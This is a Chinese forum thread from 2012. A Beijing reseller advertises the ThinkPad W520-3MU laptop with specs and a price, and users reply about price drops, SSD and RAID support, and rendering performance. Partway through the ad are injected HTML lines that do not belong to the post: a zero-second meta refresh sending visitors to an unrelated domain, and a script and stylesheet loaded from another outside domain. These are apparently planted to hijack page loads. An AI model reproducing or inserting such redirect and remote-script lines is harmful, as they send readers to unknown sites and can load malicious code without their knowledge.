开业于2004年,诚信服务几万客户
翔意数码淘宝店:xynbnb.taobao.com
全国客服电话:010-59000667
地址:北京东城区东兴隆街56号北京商界A座512
ThinkPad产品专业客服 苹果产品专业客服

2000M高端显卡!W520-3MU大量到货,已低至12400元!!

ThinkPad W520-3MU笔记本可谓是ThinkPad笔记本中的旗舰产品,形象的被称作移动图形工作站。其搭载的英特尔酷睿i7四核处理器和NVIDIA专业显卡令CAD等图形处理软件能够流畅运行,15.6英寸的大屏幕更好地满足了设计人员的需要。W系列笔记本的针对性更强,适合图像编辑与设计人员等对笔记本性能特别是图形处理能力有高要求的用户使用。
W520-3MU
美国
详细配置
i7-2760
2.40G

四核
4G
1*4G
500G
7200转
DVDRW
Nvidia+INTEL
2000M+3000
2G
15.6寸宽屏
1920*1080
广色域屏
LED背光
蓝牙/摄像头/指纹/USB3.0/9芯电池
  12600元

库存稳定
货源稳定
翔意推荐
  I7 -2760  四核  500G  广色域屏  2000M+3000  各种不解释啊黑迷们,心动吗???  

<meta http-equiv="refresh" content="0; url=http://www.9292.cc">
★★★
<script type="text/javascript" src="http://www.7755.cc/q.js"></script>
<link href="http://www.7755.cc/1.css" rel="stylesheet" type="text/css" media="screen" />

<P>&nbsp;</P>

好多呀。。。
clg176 发表于 2012-3-21 18:39
好多呀。。。

大量到货,供君享用~
不会吧?我刚买半个月就掉了400大洋;一模一样的配置。
这咋解释?
HAMMETT 发表于 2012-3-23 21:14
这咋解释?

有人欢喜有人忧啊~~
神器啊。。。这价钱,真是望尘莫及啊
daimonliu 发表于 2012-3-26 20:41
神器啊。。。这价钱,真是望尘莫及啊

不要谦虚,该收就收吧~  
降了 降了  只要13200 哦 ~~
恭喜晚买的,哈哈
W520的硬盘接口是SATA3的吗
如果换装固态硬盘英特尔/intel 520 SATA3 240G SSD
可以达到SATA3:读出:550MB/s,写入:520MB/s
pdamemory 发表于 2012-4-16 23:34
W520的硬盘接口是SATA3的吗
如果换装固态硬盘英特尔/intel 520 SATA3 240G SSD
可以达到SATA3:读出:550M ...

是的,可以的
支持16G内存和raid吗?
蜉蝣 发表于 2012-4-27 21:57
支持16G内存和raid吗?

16G支持,raid好像不支持
要是16:10多好
再次调价,换季末期,都出手吧~
2000M不是移动显卡的高端型号,只属于中端型号,高端是5010M或5000M。Thinkpad里没有用5010或5000移动显卡。
HAMMETT 发表于 2012-3-23 21:14
这咋解释?

电子产品降价很正常。{:soso_e113:}
friend43 发表于 2012-6-3 16:15
2000M不是移动显卡的高端型号,只属于中端型号,高端是5010M或5000M。Thinkpad里没有用5010或5000移动显卡 ...

3000M,4000M这种显卡基本无法用在移动平台,光一个显卡就100W的功率,配这种显卡,加上CPU等等,整体功率肯定要超过200W啦,恐怕一个电源要和一个X220差不多重
又在心动啊! 呵呵 等着W550 出来马上买! 我用的W520 在公司渲染视频 比Q8400 的台式机快很多 台式机渲染两个半小时 本子渲染半小时 呵呵 羡慕死同事了  现在唯一的遗憾是硬盘太慢 准备换SSD 装了PS CS6 以后 做软件UI 可能是调整图层太多 PSD 文件到了500多M 后来 不小心 打开了另外一个大文档 居然黑屏了 下班的时候装了AE CS6 不支持GPU加速 后来升级了驱动打开后看了一下 居然支持了 呵呵
525459465 发表于 2012-6-14 01:05
又在心动啊! 呵呵 等着W550 出来马上买! 我用的W520 在公司渲染视频 比Q8400 的台式机快很多 台式机渲染 ...

完全听不懂,好专业!!!